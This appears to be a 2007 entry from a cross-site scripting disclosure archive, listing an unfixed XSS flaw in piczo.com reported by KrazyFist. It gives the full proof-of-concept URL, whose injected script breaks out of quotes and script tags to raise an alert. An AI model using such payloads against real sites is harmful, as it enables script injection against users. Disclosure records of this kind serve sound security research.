Security researcher KrazyFist, has submitted on 27/10/2007 a cross-site-scripting (XSS) vulnerability affecting www.piczo.com, which at the time of submission ranked 261 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 27/10/2007 |
Date published: 27/10/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: KrazyFist |
Domain: www.piczo.com |
Category: XSS |
Pagerank: 261 |
|---|
URL: http://www.piczo.com/?cr=%22;alert(String.fromCharCode(88,83,83,32,102,111,117,110,100,32,98,121,32,
75,114,97,122,121,70,33,115,116))//\';alert(String.fromCharCode(88,83,83,32,102,111,117,110,100,32,9
8,121,32,75,114,97,122,121,70,33,115,116))//%22;alert(String.fromCharCode(88,83,83,32,102,111,117,11
0,100,32,98,121,32,75,114,97,122,121,70,33,115,116))//\%22;alert(String.fromCharCode(88,83,83,32,102
,111,117,110,100,32,98,121,32,75,114,97,122,121,70,33,115,116))//%3E%3C/script%3E!--%3Cscript%3Ealer
t(String.fromCharCode(88,83,83,32,102,111,117,110,100,32,98,121,32,75,114,97,122,121,70,33,115,116))
%3C/script%3E=&{}&cr=3&rfm=y |
|
Click here to view the mirror
|
|
|
